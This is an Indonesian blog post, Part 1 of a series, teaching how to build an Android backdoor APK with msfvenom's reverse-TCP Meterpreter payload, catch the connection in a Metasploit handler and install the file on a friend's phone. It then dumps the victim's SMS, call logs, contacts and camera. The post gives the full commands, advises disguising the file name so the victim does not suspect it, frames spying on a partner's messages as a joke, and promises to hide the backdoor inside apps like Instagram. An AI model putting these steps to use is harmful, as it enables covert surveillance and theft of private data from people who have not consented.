Rabu, 15 Februari 2017

Cara Exploit Android Dengan Metasploit [ Kali Linux ] [ LAN ] Part.1


Assalamualaikum Wr.Wb


                 Disini saya akan memberikan Tutorial cara exploit android dengan Metasploit di Kali Linux . Cara kerjanya adalah :

1. Membuat file .apk atau sebagai backdoor
2. Meneruskan Backdoor agar berjalan dengan Metasploit
3. Mengirim File dan Eksekusi File
4. Dump atau exploit

Bahan - bahan :

1. Kali Linux
2. Android ( Semua Versi )
3. Metasploit
4. WAIPAI /WI-FI yang bagustt ..... disini saya memakai wifi yang kenceng bener jadi tidak ada masalah sama sekali :v

LANGSUNG MULAI AJA GAUSAH BANYAK BCT !!

1. Membuat File APK

   Cek IP terlebih dahulu ... dan IP saya adalah 192.168.0.109 dan ingat ingat
#ifconfig



   Lalu buat file apk nya ...
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=444 R >tes.apk
   Keterangan :
         1. LHOST  : IP anda yang sudah anda cek tadi ( saya : 192.168.0.109 )
         2. LPORT  : Masukkan port ( Terserah berapa saja .. saya anjurkan 4444 )
         3. tes.apk   : ini adalah file backdoor anda ... anda dapat menamai apa saja , beri nama yg unik                                agar tidak curiga



    Cek pada file apk anda apakah ada atau tidak .. dan berikan pada teman anda atau install sendiri di smartphone teman anda
File berada pada /home



2. Jalankan Metasploit 

   Jalankan metasploit dengan perintah dibawah ini
#msfconsole 
untuk membuka metasploit
msf  > use exploit/multi/handler
msf exploit (handler) > set payload android/meterpreter/reverse_tcp
 msf exploit (handler) > set lhost 192.168.0.109
msf exploit (handler) > set lport 4444
msf exploit (handler) > exploit 



   Terminal akan berhenti pada starting the payload handler .... agar berjalan lagi anda harus menginstall file apk atau backdoor pada android anda atau teman anda....



3. Mengirim File & Eksekusi File

   Nama file yang tadi anda buat akan menjadi MainActivity sebagai defaultnya ,,, lalu anda install
   

    Setelah selesai install jangan langsung keluar dulu tetapi anda harus membuka file tersebut .. pilih open



4 . Metasploit

   Lalu terminal anda akan berjalan seperti dibawah ini .


   meterpreter > help
   Perintah diatas untuk melihat semua perintah yg bisa dilakukan metasploit


    Cek terlebih dahulu info device anda benar atau tidak
meterpreter > sysinfo


    Sekarang kita coba lihat SMS nya :v selingkuh atau tidak dia :v
meterpreter > dump_sms


   Setelah di dump anda akan melihat filenya di folder anda
/home


   Lalu kita buka dan....... TERNYATA ... SELINGKUH DENGAN OPERATOR AXOS :V gaboleh nyebut merk


Selebihnya anda kembangkan sendiri exploit anda dan anda dapat mencari perintah exploit di perintah help
meterpreter > help
Disitu akan banyak sekali perintah untuk dump :V beberapa contoh dibawah :
    
    - dump_callog ( untuk melihat log panggilan )
    - dump _contacts ( untuk melihat contact )
    - dump_snap ( untuk mengambil gambar dari kamera handphone )
    - dump_stream ( untuk memutar video secara live atau stream )

Sebenarnya masih ada cara lain yaitu menyisipkan file backdoor pada file apk , jadi apk file apa saja dapat dijalankan misalnya file instagram.apk dan sesudah diinstall dapat berjalan seperti biasa atau instagram biasa dan kita bisa mengakses HP victim tanpa ada curiga :v nanti di PART 2 ya.... 

Ada juga Exploit untuk beda jaringan ( Part 3 )
Jadi itu saja yang dapat saya sampaikan kurang lebihnya mohon maaf ...

Wassalamualaikum Wr.Wb

2 komentar:

  1. Mas aplikasi yang sudah di buat gak bisa di instal di android, itu penyebabnya apa ya?

    BalasHapus
    Balasan
    1. Karena aplikasi sudah terinstall sebelumnya

      -Admin

      Hapus